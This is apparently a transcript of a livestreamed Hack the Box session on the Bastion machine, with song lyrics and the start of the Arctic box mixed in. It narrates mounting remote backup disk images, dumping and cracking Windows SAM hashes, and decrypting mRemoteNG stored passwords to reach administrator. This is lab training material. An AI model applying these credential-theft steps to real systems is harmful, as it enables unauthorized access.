Hey, what's up, guys? Tonight we're going to be working through some Hack the Box. I got quite a bit of this list here done. I've been kind of working through these throughout the day, and I think I got these ones here done today. So it was a pretty big day. Got quite a bit done. Working on Bastion now. I already started it up. Apologies for the lighting. All of my lighting is run from an app on my phone, and the app is crashing. It's not loading. So maybe sometime tonight we'll get those cranked up, but for now it's just going to be hacking in the dark, as it should be, right? And we'll get started with Bastion. Like I said, I've already done a scan, so we'll be taking a look at that. As always, first we're going to connect to the VPN, as long as we don't have a TMUX session already doing it. There's not one, so we'll enter a TMUX session and get the VPN started up. Throw that in the background, and then we'll make a folder. Actually, we already have a folder. We'll go into Hack the Box and go into Bastion. And we'll launch a TMUX session from there. So all of our panels that we spawn are in that Bastion folder. Gonna set mouse mode, maybe. Then I can click around on the panels, and it's responsive to my clicks. I always like doing that. And let's go into the scans folder. I've already kind of reviewed this, but I couldn't make heads or tails of it quite yet. So in our scan, we see port 22 is open. Nothing too crazy. SSH running. It appears to be a Windows server. We have Windows RPC running on 135, and then a list here. I still kind of hazy when it comes to enumerating RPC, so I usually just kind of skip through this. And then NBT scan on port 139. We got a couple of shares here, it looks like, on SMB. A little bit more about 139. And we got a ton of files listed out here. So it looks like the admin share we have no access. Backups we have read and write access. Got quite a few folders, quite a few files. A lot of stuff to dig through here. And then same result here. It looks like we also have read access to the IPC share. And then here is our scan of port 445 with those folders again. Of course, we're scanning SMB now. And then 5985, is that WinRM, I think? $47,001, no idea what could be running here. Microsoft HTTP API, not too sure what that does, but I've seen it open on a few boxes. I don't think I've ever exploited it before, so we'll just keep moving and seeing what else is available. Got a couple of those higher ports open for what appears to be some kind of like remote management or remote access through RPC. And that's all we have for scan material. So the most interesting thing we saw was that share and the files that were on that file share. So let's go into the loot folder. We'll start gathering some loot. And what can we go after? What is the IP for this host again? 134. That's not 134. Alright. And we had, I think, backups. User anonymous. Password anonymous. So we got a note. We'll go ahead and copy that. Eclipse, how's it going? Thanks for joining. Yeah, it's been a long time, huh? About an hour or two. Oh, you know what? I don't have ownership over these folders. So we're gonna need to do something like this. Then we should be able to copy that down. Sysadmins, please don't transfer the entire backup file locally. The VPN to the subsidiary office is too slow. So it looks like we're taking backups of some system possibly and storing them on the share. Let's see, what else can we get into here? Yeah, there's a folder called Windows Image Backup. Hopefully we're not going to have to spin something up. It'll be a whole learning process for me. TMF nmap test file. Let's check that out. Oh, well that's enlightening. We have all of the letters of the alphabet a few times. Some folder with randomly generated characters. Windows image backup folder. Let's go into there. And we have a PC called L4MPJE-PC. It looks like there are a few different directories in here. Goodness, I feel like I'm going to be enumerating for hours on this one. 22, 124351. Holy smokes. I'm going to make my text a little bit smaller to make this more readable for me. If that's affecting the stream at all, please let me know and I'll see if there's a different route we could take. I wonder what these XML files look like. Oh, thank God for tab complete. Let's see. I don't even know what my text editor is. Mousepad. What was the name of that file? Oh. Can still read on mobile. Good deal. This is Tyler. Nate isn't talking to himself, but I think you can pull those. Oh, because of the message. I get it. But I think you can pull those into an online XML viewer. Not a bad idea. Good thinking. Thanks, self. All right, let's... I don't know what's going on there. Oh my goodness, there's like an unprinted character in between each character or something weird. Thinking this might be a job for like Notepad++ or something. Offline files, cache, file path, Windows System 32, file spec, bits back. Did something similar to this in the past. Oh, alright. Well, it doesn't look like it's very much fun, so I guess we'll have to just go through it anyway. I wonder if Notepad++ can do anything with this. Alright, here I have Notepad++. Oh goodness, I went into full screen mode on accident. We're gonna copy this text like 20 times because of RDP. And see if we can paste it. No, it's only doing that one. Well, whatever's going on with these characters, the clipboard doesn't even like it. Let's keep looking. Maybe I'm getting too hung up on trying to read these XML files. Or I guess maybe, one more thing. I'm going to try to throw strings at it once. Maybe strings will get that out of there. Oh, no bueno. Alright, let's see. XML files. What else could there be? Catalog. Backup global catalog. Oh, it's not a directory. Okay. I have no idea what kind of file that is. Backup global catalog. I wonder if I can figure out what program generated this based on the directory names. Metadata cache management reports the use of the metadata caches Files like SPP metadata cache that store information about the 3 types of metadata objects, or metadata caches: objects, indexes, and databases. It is an internal supporting and reference file which is needed to archive logs about certain cycles of programs that run involving data movement or backups that can be accessed to the computer. For basic users, I suggest you do not make any changes to it, as the metadata cache is a system file for cache management. Alright, don't make any changes to it. Noted. Oh, come on, Microsoft, let go of me. So it's just a standard Windows backup, it looks like. This seems interesting. Taking control of a Windows image backup folder. So it looks like this is the folder we're in right now. In fact, the folder is roughly 350 gigabytes. Wow. You don't have read permissions over some of the subfolders, strangely. So they're going through it in Windows, it looks like, on here, but I'm still going to kind of review this and just kind of get familiarity with this backup file system, I guess you might call it. This looks like we're just changing permissions. Here we go. Structure starting from the root of the drive. Windows image backup, computer name, backup date and time of backup. So that's what this is. This is our backup date and time. Catalog, backup catalog. We have these folders, well, these files. We've copied them down. We found a bunch of XML files. There were some VHDX files in there. I didn't pull any of them down. There should be some log files here. And one file with random letter number combinations separated by dashes. In the end, you have fully... Oh, so this is what permissions they want you to... Let's take a look at the anatomy of a Windows backup. Windows 7 maybe still relevant, who knows? So this looks right. To back up an entire volume, system image creates VHD disk image file, which is the same format used by virtual PC and virtual server. In fact, you can mount the VHD files as secondary disks in either virtual PC or virtual server, granting you quick access to individual files contained within the backup of a virtual computer. You cannot easily boot from a system VHD file, however. That's good to know. So I'm not going to waste a bunch of time trying to build like a Windows VM and restore these or anything like that. It looks like we might be able to just mount them as an external disk and view the contents, which would be sweet if we could do it that way. So what's next? How do we view these files? Well, first of all, I suppose we should download them. We'll go into the backup folder. That didn't work. Backup 2019 02 22 124 351. Oh, there they are. So can we do like wildcards in here? Just like get VHD? No. There's some batch way to download stuff through SMB. I can't remember what it is. There's like a... Let's see. There's like a mget. Yeah, mget. Which I think lets you do something like this. VHD. Yes. Yes. Just thinking they're too large to download. I think you can mount the SMB drive themselves as a mountable drive. Oh, that's a good point. It looks like they're downloading. But we could mount the SMB share, and then I think we would have to mount the drives themselves. I'm not sure how that would work. We'll just try to download them. It seems simpler, less moving parts. So we got one of them all the way downloaded. Are they the same file? They look like they have pretty similar file names. That looks like the same file twice. I don't know. I feel like it wouldn't let them appear. Oh no. Sorry about that. For whatever reason, OBS says that it just crashed, but it's back now. Didn't the hint say don't try to download these? Oh, that's a good point. Okay. So yeah, I guess we should try to mount the share. These names are identical, are they not? I can't get over that. Normally you can't have two files with the same name. I wonder if just one of them's like a temp where it's loading. Who knows? Or maybe there's one character different and I'm not seeing it. Let's try to mount those shares. Or that share. So we'll run sudo mount. We need to make a directory called mnt. We'll call it backups. And then we'll change our mount point to backups and add our external drive in. 10, 10, 10, 143 I think it was. 134. Oh. And then backups. It's gonna want credentials, I think. Well, that's mounting as root. How do we supply a user for mount? I think it might be an option we might have to specify. So let's say with credentials. Yeah, downloading the backup files crashed the stream. Seems logical. I mean, it could happen. My bandwidth is, well, what is it, bandwidth or throughput? I don't remember what they call it, but I had one of the lowest tiered ones. Because I'm cheap. Here we go. -O. Username equals user, password equals password. So we'll run this command again, maybe. It doesn't like that I'm trying to force quit that. I'll have to wait for it to go through. Yo, that actually is messing up my bandwidth. It's just killing Kali. Hopefully I didn't fill my disk up. That's happened before. And then you can't RDP into it. Crap. That'd be no good. Is it even on? I'm pretty sure it's on. It's running. Am I getting DDoSed? China's DDoSing me. Damn it. Wow, it's not doing anything right now. My goodness. I'm gonna have to reboot. Hopefully it comes back up. I don't know what I'll do if it doesn't. Probably switch over to one of my VMware workstations. Yeah, right? I better type my Kali credentials into have I been pwned. Right? It's got like some malware in it when I downloaded it. Should already be in my known hosts. Alright, looks like it's back online. Looks like it anyway. My disk isn't full. That was a dumb idea. I shouldn't have even ran that. I guess we'll just continue as if nothing happened. Alright, we were trying to mount that share, so let's try... Is that still on my clipboard? Nope. Oh, it is working. Okay. Mount TCIFS. And then I think we did the share 10, 10, 10, 134, right? And then slash backups. We're going to be mounting to MNT. I'll have to run this as sudo. MNT backups. Options. We got a user is anonymous. Was they comma separated? I can't remember. Oh, of course I looked it up in Windows or in the Kali VM, which crashed. Let's see. Mount file share with credentials Linux. Yeah, comma separated. and then password equals anonymous. Oh, I fudged up the case. Okay, that seems like it worked. It did indeed work. Alright, well, we could enumerate a lot quicker this way too. Go into the backup folder, and then I wonder if we can mount these directly, because I think that's what we'll need to do is mount VHD. I'm gonna look it up on my other screen here in case Kali decides to crash again. Oh look, it was right there. Okay, mounting VHD on Kali. So here's the article I'm reading. Mounting VHD file on Kali Linux through remote share. Recently I came across an instance where I found a VHD image on a remote share. These files are typically used to back up data stored on a hard disk partition. As such, data on a VHD file is very interesting to penetration testers since it may contain valuable information. There were two problems. I was on Kali, so I didn't have a good way to mount, and their VHD files on a remote share, and they can't be downloaded in a reasonable time due to the size of the file. Sounds exactly like the situation we're in, right? After reading through a bunch of articles and a forum post, I came across a tool called Guest Mount that allowed me to mount VHD in my Kali Linux environment. If you're running Kali, this tool should be available in the repository. You can get it by running the following. After you install that, you should have Guest Mount available. Before we begin using Guest Mount, we still need to solve the issue with the VHD file being located on a remote share, not easily downloadable. So then he's going to go through and mount the share like what we just did. We can now mount the VHD file using the following command. So we need to install libguestfs-tools. Alright, do I just click it to copy? We'll do the old school copy paste. I'm going to switch this to a different pane because it looks like each character I type is having to be sent back and forth between the share, or it's being delayed for some reason. Apt-get install. And then we'll run guest mount. So while we're waiting for that tool to install, I'm going to add this to my playbook. This seems like a pretty good tool to have in your tool belt. You never know when you'll need it. I don't really know a good spot. I suppose attacks is a good spot. We'll call it mounting VHD files from remote share. Install. I'll move my notebook over so you can see what I'm typing here, and then I'll move the notes that I'm copying from over to the other screen. libguestfs-tools. Install CIFS utils. Mount SMB share. And we just did that. We know that it's sudo mount tcifs, T for type, I think, and then remote host share, and then mount point, and then we do options, user equals username, or was it username? I don't remember. Probably username. Let's double check. Can't be making the notes all bad. O is user. Where did that go? Here it is. User equals username, comma, pass. I should have looked. Was it pass or password? Password. Password equals anonymous. Well, let's say password. And then also domain equals domain, because we might need that someday. And then mount VHD images, I think they are, or files. For that, we're going to use guest mount, add mnt remote path. We'll just say file path inspector RO. Who knows what that's for? RO. No idea. Read and who knows. We'll have to read through the documentation here and see. MNT VHD. So we'll say mount point. V for verbose, I'm assuming. And then we'll put that in my index of attacks here. We'll call this one, well, what did we call it? Mounting VHDs. There we go. Now we can try to run that. So we're in the mount up here. What's going on? Oh, I gotta set mouse mode. That's why. Let's try that command. Guest mount. Oh no. Unable to fetch some archives. It didn't install? Let's try fix missing. Okay, looks like it's working this time around, hopefully. Yeah, to be honest, I was thinking this was going to be a lot more work to set it up this way. It's nice to know it's just a couple of commands, and not downloading those large files has a huge benefit too. Oh, it crashed again. What the heck? Errors were encountered while processing dbutils. Well, do I need to do just like a standard apt update or something?
Fire spreading
Oh, thank God for helpful output, right? Do we have that command available now? So we're going to be doing guest mount. We do have that available now. Perfect. All right, we're going to copy this command and we'll fill in it as we go. It's still not showing up here though. What the heck? Did I spell it wrong? Guest mount, add. Let's see. Our file path is right here. Maybe we should do it out here. And we'll specify the full file path. And the file path can be gotten just right here. I'll copy that. Oop. And then I guess there's spaces in it, so we probably should have quotes. Oop. Gotta put a 1 here, and then we're gonna be looking at this file here probably. Are these files the same file? This blows my mind. 9B, 9C, FBC. Oh, this one has a 3 and this one has a 4. They're indeed different file names. The mystery has been solved. This box is complete. Let's go home. Where are we gonna mount it to though? We'll call this VHD1. MNT VHD1. Seems to be doing something. I mean, that's not bad, right? If it was gonna fail, I think it would have failed by now. This is exciting stuff. I've never done something so awesome. Mounting a drive through a drive that's mounted. Ooh. I do see failed popping up every once in a while. Did it work? It did not work. Alright. Well, what are we missing? Do we need to do it as writ? Maybe I need to read the write-up a little bit more about how to use this guest mount. Still nothing. So do we try the other one and think maybe there's just something wrong with that image? Might have to go down a Google rabbit hole. Oh, the RO is read only, it looks like. Hints, run it as a normal user, not sudo. Okay, we'll try that. Switches from the man page, -- add. Do we have add in there? Yep, we have add. Inspector, using vert inspector code, inspects the disk looking for an operating system and mount file system as they would be mounted on the real virtual machine. Maybe we need to skip that switch, because this doesn't have the operating system. Well, maybe not. Maybe we need that switch. Something's not working here. This doesn't work, we might be looking at other ways to examine a VHD file. Although all these tutorials so far are saying to use this guest mount utility. No operating system was found on this disk. Remove this option. Instead, use the commands run followed by list file system. What? Oh, that's for guest fish. Okay, a different program. If using guest mount-I, remove this option and choose the file systems you want to mount manually by using the M options. Use virt file systems. Okay, so we need to do virt file systems, which does exist. All right. And then I just saw something about how to use this. There it is. Oh, that was very complex. Just the file name now. So we'll do the first one first. Extra argument on command line. Make sure to specify an argument for format, like format equals yada yada. That's not a command. Okay, I'm going to cheat and look at a walkthrough because I feel like that's going to be the quickest way to figure out what command I'm supposed to use. And I'm already Googling anyway. So this one was called Bastion. And we'll pull this over to the screen. We've looked through our scan materials. We see SMB. We find the backup while we read the note, right? We find the backups. Mounting a backup image. Dumping credentials user flag. The images are system backup files. As the note said, trying to download them will take a very long time and probably won't finish. That's a good tip. So instead we will mount them. I wanted to look at this one first. This was helpful. That seems like a lot of work. Grant me your bacon. I like that. Alright, we'll give this a shot. So, there's a few different commands we have to do. Load the NBD kernel module. Yes, I'm serious. The network block device module. Note, all of the following commands require super user permission, so escalate your privileges in whatever way makes you most comfortable. This might be why our other command was failing. Maybe not. So let's just try this command, I guess. Maybe we're already set up to run it. No errors. So that might be good. We'll pull this to the other side so you don't have to read through it with me. And then we should try Kemu. I have no idea how to pronounce that. C dev nbd 0. And then our VDI file. Well, we're not using VDI. That's not there. Let's see. It's already installed. Well, what on earth am I gonna do? Guess we could just try to run the command. So that doesn't seem very helpful. Alright, we'll try this out. There's a little bit better of a comment that explains it. We need sudo apt get install kmu utils, which we've already done. Everything's installed. Now load the NBD kernel module. So that would be sudo rm mod nbd and then sudo mod probe nbd max part 16, then run kemu nbd. Oh, that is it. Okay. Dev nbd 0 and our VDI file, which is not a VDI file at all, but it should still work, hopefully. Permissions denied. Okay, now we should be able to just mount it? Mount dev nbd 0 p1 mnt vhd1. Well, that seemed pretty simple. If that worked, I'll be surprised. It did not work. Okay. What's going on? Why can't... Alright, we'll just look at the walkthrough. Let's see what's going on. So he does makedir and then creates a folder and then does mod probe nbd, but he's running as root sudo su. Mod probe nbd mount t. We've already done that part. Mounted that. RC dev NBD0. And we're going to be looking to mount one of the files in here. And then there was no switches on that. It looks like you just did that. Failed to get shared right lock. Oh no. Something else is using it, which means this did something. How do we get rid of it? Let's try that again, but we'll use the other file. So this is just a 4 in the other file. Failed to set NBD socket. Okay, how do I cancel or list? Typing Q with a letter other than you following it is nearly impossible. Disconnect. So let's do that. Okay, is there a list? Try that one. What did we call that one? Dev NBD 0 P1. Hey, good deal. It says that it's mounted. Okay, I'm going to try this one more time. Kumu NBD RC dev NBD 0, and then we'll select the file. And we'll use the first one. Failed to set NBD socket. I'm going to try to reboot. Take a 5-minute break and let it reboot, and then we'll come back and try it a few more times, see if we can get it working. So we'll see you in 5 minutes.
Just like the street lights lit this town, like a fire in a blaze, gotta burn it down. Can't be afraid to leave this out. We got this far, don't know how. I see danger in your eyes. They know we'll burn down the night. Coming just like the sunrise. You know that we gonna let it away. Tonight, we gonna let it away. Tonight, we gonna let it away. Just like the sunrise, we gonna let it away.
All right, I'm back, and Callie's back up and running. Got connected to the VM, started up another TMUX session, and connected to the VPN. And we need to mount CIFS 10.10.10 134 backups. And we'll put it at MNT backups. We also need to provide credentials. And we'll go through those steps again here. Where are they? So, we're going to verify we have a directory to mount this to. VHD1 is our target. Do mod probe NVD. Mount. We have already done the CIFS share. KMU NVD RC dev NVD 0. And then this is where we specify our file path. That's everything in that command, so that should create a device called NBD0 possibly. Is that what we're doing with that command? And then, just out of curiosity, so it's not mounted yet. It is showing up here though, so there's a partition here. It looks like this might be One of the system partitions. It's pretty small. Who knows? Let's try that longer. Mount R dev nbd o partition 1 mnt vd1. What was it? vhd1. Mounted. Oh my gosh, it worked. Okay. Alright, so this is what looks like the boot sector or something. It doesn't look like it'll actually have any system level files in it. So let's get rid of that one, I guess. Or can we just make der mnt vhd2, and then we'll run that same command for the other drive. Oh goodness, we changed directories. Oh, I see why that wasn't working. We have to specify a new disk name. We're creating like a virtual device. And I was trying to do NBD0 twice. So now we have an NBD0 and we have an NBD1. So now we should be able to just mount it. And then we'll put a 1 here. And we'll put it 2 there. Oh my gosh. You guys, this is a Windows file system. We can see the users. Set mouse again. Where would we find passwords? Let's see what this guy has on his desktop. That could be revealing. Nothing. Alright. We have a cookies folder. We have contacts, application data. Let's go into program. Whoa. Just noticing there's not like... Is it program files? Is that what I was thinking of? Probably is. Let's go in here and enumerate some programs that are running on there. Windows Defender, DVD Maker, Internet Explorer, reference assemblies. No idea what any of this stuff is. Nothing too cool installed. Although that DVD Maker, I don't know, is that like a built-in Windows feature? Who knows what that is. Program data. I wouldn't even know where to look in here. We're in application data. Is that just a link back to itself? We could just keep going further and further into it. That's funny. Let's check out desktop. That's actually our desktop. Are those like just links? Yeah, those are just links. So the only real folder here is Microsoft. I'm not seeing anything in here. You know, I'm gonna weed the walkthrough. We'll see where the files are, because to be honest, I've never done this before. No idea. Get on a Windows file system. Apparently there's stuff. Search for users, for the user flag or any passwords, but there wasn't anything there, so I checked Windows System 32 config. As you can see, we can read system and SAM. Oh! My gosh, that's so smart. Okay, we're going to be dumping the SAM file, and that's actually something you can't do when the partition is mounted and in use on Windows. So, I think I learned about this in my offensive security class. We were reading the Hacker Playbook, and one of the things they walk through is, you know, in Linux they walk through the password file and the shadow file, but then in Windows they covered the SAM file a little bit and mentioned that that's where password hashes and stuff are saved. But you cannot, as a security mechanism, you cannot dump that while it's mounted, or there's something weird about that. And it looks like since this isn't mounted and in use on a Windows computer, we could just dump this and then use SAM dump to get hashes and then crack the hashes, I assume. Secret stump will do the same thing. So we could use SAM dump or we could use secret stump. So I guess we might as well just use the walkthrough at this point to see where those files are located. They're just in the config folder, so we're getting config system and config SAM. This will be something good to add to our notebook here. So I'm going to actually put this in Windows and AD. I don't know why, I just made like a shoot off of notes. This was initially supposed to be like, here's my checklist for Windows hosts, but slowly it's turned into like, these are specialized commands for situations you'll get into on Windows that you won't get into on Linux. Password hashes from SAM and system. Is it Windows System 32 config SAM and Windows System 32 config system? You can reveal hashes with SAM dump 2 or secret stump. So let's do that. So we're gonna go back to the root of this drive, and then we'll copy Windows System 32 config. System. We'll copy that to home 8. Hack the box. Bastion. Loot. We'll do the same with SAM. And now we're we're pretty much done with our root session. We could probably exit out of that. And then we'll go into the loot folder and do secrets. Ooh, secrets dump. Oh, maybe we'll have to do SAM dump too. Suppose we better look at the... So we need to do system and then SAM. SAM dump 2, system, SAM. And then we can do output to hashes. And then we can not crack map exec. Cracking passwords with not Hydra, hashcat. User share word list. Rock you. We'll give that some time and then we should get user from this. So let's use that time to work on our notes. Oh, is it done already? That was easy. So we have a password here. Now this is a set of credentials we have now. We have a username and password. And SSH was open. Let's give it a shot. L4MPJE at 10:10:10, 143, 134 actually. Password is going to be our clipboard. Look at that, we're on. And then we can get user through desktop. Type user.txt. Boom, we got the user flag. I'm kind of concerned because this said when we dump the SAM file, it says that administrator is disabled. Maybe that's a good thing. Account is active. So maybe it was disabled at the time of backup. I mean, maybe we could still crack hashes. Who knows? There is a hash there. It seems to be the same as this guest hash though, so I would assume that it's just some kind of generic thing. Hard to say for sure. Let's remove the disabled and see if we can't figure something out. Try that. Oh yeah, it looks like it already gave up. So that must just be like a default this account has been disabled hash or something like that. But administrator is enabled. We have to privesc somehow. So Windows system info. Access denied. Cool. Password never expires. I'm in the users group. I guess we could run WinPeas. Let's enter that the flag into Hack the Box quick before I lose it. And then we should probably get our notes caught up before we move on to privilege escalation. I already lost it. It's not working. Am I gonna have to type this? DA 4266544646. Alright, that worked. Let's get the notes caught up. Because we have nothing on here yet. So port scan shows 22, 139, 445 open. We find an unprotected share backups, which contains the backup archive of a Windows PC. And then I'm going to copy from the playbook. So that's kind of the nice thing. That's the whole point of me building this playbook, is I can come in here and as long as I can find stuff that I've put in here, we could just copy it and then paste it into the notes when I'm doing write-ups. And that should be quite a bit less typing. Now obviously it would probably be quicker just to copy the commands as I type them out and put them in here. So this isn't that beneficial, but it does help to have kind of your own repository. Of like plays that you're familiar with. If anything, it helps build confidence on the number of attacks that you know. Looking through this, it's like, wow, I've gone through each one of these things, and maybe I am ready for another round of the OSCP. I guess we'll find out. For here, we left that off, and then we did a guess mount. We actually didn't use guess mount, so it's a good chance to update our notes for what we actually did do. We didn't actually need that either. Not the VHD file. So we started with sudo mod probe nbd, and then we did sudo kemu nbd rc device name. Well, we're just gonna, yeah, here we'll put device name. We'll call it like new device name or something. That way I remember that it's just being assigned a label at the time of creation. And then we did file. Next is to mount it. R. And we'll say new device name so we know it's the same. And mount point. There, that's all fixed now. And we didn't need this. Well, we did. We didn't need this one. So we'll copy this new stuff over. Overwrite this part. Oh, I needed more, not less. There we go. Kind of. I'm not a huge fan of this live preview mode. it tries to be helpful and it's not. Mount the share, mount the drive, or the VHD file, and then dump the SAM and system files for cracking. Copy. Let's see, what did we would have had to type C Windows System 32 config SAM. Copy C Windows System 32 config system, and then I guess we'll just throw it in here. SAM dump 2, and it was system, and then SAM output to hashes, hash cat hashes user share wordless rocu.txt. We now have user credentials, which are L4 M, no M, yeah there is, MP JE. Oops, sorry if that was loud. Password is LabJ. Cool, now we're caught up. What's next? Privilege escalation. Let's host WinPs. Oh no. I can't even write to my own desktop? Or I don't have permissions to do certutil. I can get into PowerShell. I wonder if I can wget. And then output file. There we go. Saw a PowerShell history file that might be useful to look at. See if we can get this box popped before I quit for the night. Unquoted service path. Looks like some false positives possibly. All we really saw was the PowerShell history file, which is right here. Let's take a look at that. Whoa. That is my history. This is what I've put in there. Nothing more, nothing less. Well, how do we privask then? We can't do system info. Or can we? Nope, access denied. What to do, what to do. Win piece found nothing. I guess we could try... invoke... what is that? Invoke PowerShell TCP. We'll copy that. Oop. Copy invoke PowerShell TCP to hack the box. Bastion. Check the C directory for weird folders. Alright, good idea. Let's check it out. Oh. There's a backups folder, there's a log folder. I guess I could enumerate programs. Looks pretty standard. Oh, there's something. mremote ng. Never heard of it. Good call, HunterBot. Way to think. We'll see what this is. Does it have like a version in here or anything? Oh, search split finds nothing anyway. Maybe this is something that isn't actually that crazy. I'm gonna pull down invoke PowerShell TCP and no, that's not what I wanted. I'm looking for Sherlock. Did I even save it? That config file looks interesting for the remote ng. Well, maybe it's worth looking at. I didn't see a config file. Oh yeah, right here. We'll try that. Feeling pretty limited with PowerShell here right now. I'm gonna try to copy that file. Oh no, it hates me. Yeah, I'd like to copy this over to Linux and run grep and stuff on it. It's not cooperating with me. Let's see. We could do a Python 3 Samba share. Oh god. I'm not even in the right folder here. Go back to PowerShell. don't know why I need to do that. It was just in here, I think. And then we'll do net use 10.10 16.4 share. User is df and password is df. Alright, I think we got it now. What is the file name? And we should have it now. Maybe. What folder are we in down here? Should just be in here. It's not. It didn't work. It's not copying the file over. What the heck is going on? Well, I'm getting kind of exhausted here. I think I'm gonna call it a night and come back at this tomorrow with a fresh head, because I like where I'm at. I'm not at a point where I want to look at a walkthrough, but this does seem like a good thing to look at. We should probably look into that config file a little bit more. So, I don't know, I'll have to brush up on PowerShell or find some way to transfer this file. I guess we could do SCP the other way, possibly. Anywho, I'm going to call it a night. Thanks for joining me if you are still here. I appreciate. Wasn't it in loot? No, it wasn't in loot. I'm just, I spawned the share. Oh, crap, you're right, it is in loot. Okay, let's go back to loot. Maybe I'll push on. Let's see. There it is. Alright, HunterBot. You gave me the willpower to go on. And then how do we grep lines before, lines after? Grep before. So you can do, oh, that's pretty easy. A2 after 2. Oh, these look like binary settings. And there's no value here. Yeah, I don't want to keep grepping through this, so I am going to call it a night, but I appreciate you getting me over the hump there, HunterBot. That's awesome. We'll see you guys tomorrow. Well, no, I take that back. Today's my last day this week, I think. Tyler was saying he may have to work evenings this week. If he does, I might hop on and stream a few times, but otherwise, I guess you won't get to see me go through the rest of this, but I'll make sure to do a write-up and post it online, all that good stuff. But I appreciate you joining me tonight. We'll talk to you guys later. All right, let's get this show on the road. So Tyler is not going to be streaming tonight. He's got some stuff to do pretty early in the morning. So I'm going to stream tonight, and I figured I'd get started a little bit early. I'm currently working through this box called Bastion, and where we left off, let's see if I can get some stuff cleaned up here. Let's see, where were we on Bastion? If I remember right, we had access to a file share. We also had access to some virtual hard drives, which we mounted. And we found... What the heck did we find? Found something on there. So we mounted an SMB share. We found a VHD file. We mounted it and found... Oh, we pulled the SAM and system files, and we were able to crack some hashes. So now we have credentials to log into this box. We're able to log in and get just a low-level user. And we were looking through some file for credentials. Some remote management type software was installed on the box, and there was a config file we were digging through, and I haven't worked on it since. I did punch in a few commands and just kind of look around a little bit. But if you were following last night, this is exactly where we left off last night. So let's get back into it. I did do a quick search, just looking for this M remote NG, and I think I was just searching for like details about the comp file, and I ended up finding this. It's called Exploiting Remote NG, and it's pretty cool. If you look at the screenshots, you can see we have this same user that we've exploited. So whoever put this together, this guy here, Vry4n, must have done this box and just made a little tutorial with it. So we're going to read this as if it's not a walkthrough, right? This is just some details about how to get some credentials out of the config files. So it looks like we're actually going to be looking at app data, and I think we're not in app data. I think we're in program files, so that might be the cause of us not being able to find it. Of course, the box is not online anymore. I'm going to have to power it up. Taking a minute to load here. Taking a few minutes to load. Disconnect from that. Wow, this is taking a while to load. Is Hack the Box isn't down or something, is it? Oh, it's logged me out. That's what's going on. Alright, the box is back online. We have the same IP, and we're gonna SSH here with the password that we gathered. We might have to reconnect to the VPN. So either the box isn't booted all the way quite yet, or something else is going on. There we go. So we'll put the password in that we got. And then we'll go to app data. And then we'll go into this M remote NG. And we have a few files. What is the file that we're looking for here? confcons.xml. Okay. Some details in here. We have an ID, a username, a domain, a password. So that password is quite a bit longer than the one we're using. I wonder if that's a password hash. Doesn't really look like one. Grab a screenshot here. And then highlight the important parts, which is this password. And then we'll also take a look at this other possibly connection. Node name DC, so that's a domain controller it looks like. Username is administrator, and here's a super secret. This one looks like a password hash. I assume the other one is as well. This one looks like base 64 encoding, to be honest. But in the config file, it looked like everything is encrypted with AES. So let's see if we can snag a copy of this file. Is this still running? Oh my gosh, it is. All right. So we could do netuse 10.10.16.4 share. User is DF and password was DF. Now we'll copy, instead of type, we'll copy over to 10.10.16.4/share. It would help if I use the correct command here. And then we should have it here in loot. So we can cat conf cons. And then we can grep for password. Let's ignore case. So we have a password here. And we'll put that in our notes. What was the name of this file? confcons.xml. Find a few username, password combos. Throw the screenshots in there. And then let's do something that's easy to copy paste from. We have L4 MPJE, and then I'm not going to put anything in there yet. I'll just throw the usernames. We're going to crack these hashes, hopefully. So let's do probably want to put this in a different pane. We'll call these the M remote and G hashes. Oh, and of course I missed half of the hash there, so let's try that again. We'll get rid of this line. There we go. So we know that the first one is our current user, and this other one up here is admin. So we'll copy this whole thing. So we're more interested in the second one, but let's throw both of them at, let's throw hashcat at both of them. Hashcat and remote ng hashes user share wordless rocku.txt. Doesn't know the structure of the input hashes. Hash ID. So these are unknown hashes. AES sounds really familiar. Prime Cutie, keep doing what you do, man. Well, thanks, Prime Cutie. I'm starting to think that you're a bot because this is the second comment we've gotten from you with the same content in it, but who knows? Maybe you're just a nice person and that's all you know how to say. I'm not a bot, man. Oh, okay. Well, hi. Nice to meet you. Thanks for joining us. See if this is base 64. That doesn't seem like base 64. It's got a few interesting characters here. Unknown hash. Well, need to crack the password. We will use a tool and remote ng decrypt. Cool. I like it. But you can do an Alan Turing test if you want. Yeah, I'll put you through the Turing test. That's a good idea, Prime Cutie. Am I saying your name right? Is it Prime Cutie? Prim QT? I don't get it. I'm sure it's just a username like everybody else, right? So we can pass those hashes in now. Custom password. Base 64 string. So we'll do S for password in cat etc. No. Home Nate. Hack the box. What's the directory this is in? Bastion. Loot. And remote ng hashes. Do password. Oh no, what am I doing here? S password done. There we go. So this matches up our user password that we already knew about. This is the new password that we have, and this appears to be an admin password when we were looking at the config file anyway. So we should be able to log in as admin now. Let's see, we'll say we used a tool on GitHub to crack these hashes. HunterBot. Oh, so that mremoting was actually a privesc vector. Yes, HunterBot. Indeed it was. And we were looking at the wrong file. We were in program files looking at some config, and that was like the options for the program, I think. But if you go into app data, there is another config file where you configure all your connections. And so we found some encrypted passwords in there. So good spot on that. I was gonna blow right past this and just not blink an eye on it. That would have been a mistake, and I probably would have ended up going to a walkthrough. So good spot, HunterBot. And now we should be able to log in as an administrator. What am I doing? That's not at all what I should be doing. 134, I think. We are administrator now. There's the admin. Flag, admin flag. We'll submit that here, and we'll say that it was pretty easy. If I could leave a comment here, I would say it was easy, but HunterBot was helping, so... And we're done with this one. Next up we have Arctic, and I want to say I've done Arctic before, but I'm not positive. I have indeed done Arctic, so I'm not going to look at my notes. We're going to start fresh. But since I know I've done it, I won't be taking notes. So we'll just kind of do like flying off the cuff of my sleeve. Is that what they say? Who knows what they say? Arctic. Spawn the machine. Whoops. And then we'll get out of this. Of course, we're going to have to kill the pane because SSH is no longer functioning. What is going on here? Oh, that is also... So that's where our remote share was mounted. And then we'll get rid of that. Not even well, yeah, I better make another directory. We'll call this one Arctic 2. And let's try to do it without auto recon this time. Make sure I'm not losing my ability to enumerate without it. And I'm going to close the notebook so I don't accidentally look 10, 10, 10. That should be pretty easy to remember. Nmap. We'll do a version scan 10, 10, 10, 11. Is that right? And then output all formats. We'll put it right here and we'll just call it nmap, I guess. The host seems down. Maybe we just need to give it a couple minutes. Who knows? We're getting a ping back, so maybe we can do nmap now. Alright, I guess we'll just add the PN to it. It's taking a minute. So while that runs, I'm actually going to run and grab some more water. I'm going to switch over to the break screen. It won't actually take 5 minutes though. It'll be a lot quicker than that. I'll be right back.
Oh, you make me wanna talk back to you. Say it like that. If I hate you, then find someone new. Baby, but you know I never will. No, so I choke you down just like a pill. Take you like a
